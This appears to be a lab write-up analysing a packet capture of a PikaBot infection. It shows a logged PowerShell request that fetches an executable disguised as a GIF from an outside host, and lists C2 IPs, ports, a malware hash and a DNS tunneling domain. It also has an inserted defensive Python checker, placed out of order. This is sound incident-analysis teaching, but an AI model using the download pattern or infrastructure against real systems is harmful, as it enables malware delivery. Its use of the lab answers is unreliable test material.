Compromised

  • Difficulty: Easy
  • Status: Active
  • Topics:
    • PCAP analysis

Scenario

Our SOC team detected suspicious activity in Network Traffic, the machine has been compromised and company information that should not have been there has now been stolen – it’s up to you to figure out what has happened and what data has been taken.

The Sherlock archive contains a single file, capture.pcap.

Tasks

What is the IP address used for initial access?

The conversations view in Wireshark shows that the traffic captured in the PCAP is between what appears to be a server (172.16.1.191) and multiple clients. Most of the traffic is over HTTPS and encrypted, making it impossible to tell what goes on in the conversations.

In the Conversations → TCP tab, one connection to 162.252.172.54 on port 80 stands out: the server is the one connecting out to an external host, and the request's User-Agent shows it was made from Windows PowerShell. Furthermore, the response's Content-Type header claims the data is image/gif, but the body starts with an MZ header, so the content is actually a Windows .exe file:

GET /9GQ5A8/6ctf5JL HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.963
Host: 162.252.172.54
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:32:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Accept-Ranges: bytes
Content-Length: 1288212
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

MZ......................@................................... .........  .!..L.!This program cannot be run in DOS mode.
...

The initial IP address used for the attack was 162.252.172.54.
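The mismatch above (a declared Content-Type of image/gif on a body that starts with the MZ header of a Windows executable) is easy to check programmatically once the HTTP object has been extracted. The following is an added example, not part of the original writeup: it parses a raw HTTP response, compares the declared type against the body's magic bytes, verifies Content-Length, and hashes the body as sha256sum did above. The sample response is constructed to mirror the capture, and the magic-byte table is a small assumed subset.

```python
import hashlib

# Leading-byte signatures for a few common types (assumed subset, not exhaustive).
MAGIC = {
    b"MZ": "application/x-dosexec",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG": "image/png",
    b"%PDF": "application/pdf",
}


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def sniff_type(body: bytes):
    """Return the MIME type implied by the body's first bytes, or None if unknown."""
    for magic, mime in MAGIC.items():
        if body.startswith(magic):
            return mime
    return None


def check_response(raw: bytes):
    """Flag responses whose declared Content-Type disagrees with the payload."""
    _, headers, body = parse_http_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff_type(body)
    declared_len = headers.get("content-length")
    return {
        "declared": declared,
        "actual": actual,
        "mismatch": actual is not None and actual != declared,
        "length_ok": declared_len is None or declared_len == str(len(body)),
        "sha256": hashlib.sha256(body).hexdigest(),  # same value sha256sum would print
    }


# Constructed sample modelled on the capture: GIF headers wrapping an MZ (PE) body.
SAMPLE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.52 (Ubuntu)\r\n"
    b"Content-Length: 64\r\n"
    b"Content-Type: image/gif\r\n"
    b"\r\n" + b"MZ\x90\x00" + b"\x00" * 60
)
```

Run check_response on each object exported from Wireshark; a mismatch with an executable signature is the kind of finding that deserves an alert regardless of what the headers claim.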

What is the SHA256 hash of the malware?

The file can be extracted in Wireshark from File → Export Objects → HTTP. The SHA256 hash can then be calculated like so:

$ sha256sum extracted.exe 
9b8ffdc8ba2b2caa485cca56a82b2dcbd251f65fb30bc88f0ac3da6704e4d3c6  extracted.exe

What is the family label of the malware?

Searching for the file hash on VirusTotal reveals the malware comes from the PikaBot family.

When was the malware first seen in the wild (UTC)?

According to VirusTotal, the First Seen in the Wild was on 2023-05-19 14:01:21 UTC.

The malware used HTTPS traffic with a self-signed certificate. What are the ports, from smallest to largest?

Self-signed certificates aren't immediately obvious when navigating through the packet capture, but like all other TLS connections, they do start with a TLS handshake. Client Hello messages can be filtered using the ssl.handshake.type == 1 filter in Wireshark (newer versions also accept tls.handshake.type). In this case, there are handshakes going to four ports: 443, 2078, 2222 and 32999. Of these, the connections on port 443 are to well-known domains and can be disregarded.

The ports in question are 2078, 2222 and 32999.

What is the id-at-localityName of the self-signed certificate associated with the first malicious IP?

The id-at-localityName property is part of the certificate, which the server sends in the Certificate message during the handshake. These messages can be filtered using the ssl.handshake.type == 11 filter in Wireshark.

The first self-signed certificate in the list is from a connection to 45.85.235.39 on port 2078. Expanding the tree reveals the id-at-localityName as Pyopneumopericardium:

(Screenshot 2025-05-04_17-33.png: expanded certificate tree showing id-at-localityName)

What is the notBefore time (UTC) for this self-signed certificate?

The notBefore property is defined in the next section of the certificate:

2023-05-14 08:36:52 (UTC)

What was the domain used for tunneling?

One of the most contacted addresses in the capture (172.16.1.16) appears to be a DNS server. Filtering out only the traffic to that IP address returns a long list of queries for a single domain name:

(Screenshot 2025-05-04_18-34.png: DNS queries to 172.16.1.16 for a single domain)

The domain name in question is steasteel.net.